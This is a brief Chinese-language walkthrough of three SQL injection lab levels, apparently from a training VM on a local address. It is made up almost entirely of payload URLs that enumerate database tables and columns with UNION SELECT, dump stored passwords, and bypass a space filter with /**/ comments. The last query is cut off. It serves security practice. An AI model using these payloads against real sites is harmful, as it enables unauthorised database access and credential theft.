第一关
http://192.168.1.142/sqli/example1.php?name=root
有可见传递参数,测试是否存在注入
http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入
pyaload
http://192.168.1.142/sqli/example1.php?name=root' order by 1 %23
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20group_concat(table_name),2,3,4,5%20from%20information_schema.tables%20where%20table_schema=%27exercises%27--+
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20%20group_concat(column_name),2,3,4,5%20from%20information_schema.columns%20where%20table_name=%27users%27--+
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20group_concat(passwd)%20,2,3,4,5%20from%20users%20--+
第二关
提示 ERROR NO SPACE
拦截了空格 使用/**/代替空格绕过
http://192.168.1.142/sqli/example2.php?name=root%27union/**/select/**/group_concat(passwd),2,3,4,5/**/from/**/users%23
第三关
感觉第二关一样
http://192.168.1.142/sqli/example3.php?name=root%27order/**/by/**/5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/1,2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/null,2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/database(),2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables/**/where/**/table_schema="exercises"%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/group_concat(column_name),2,3,4,5/**/from/**/information_schema.columns/**/where/**/table_name=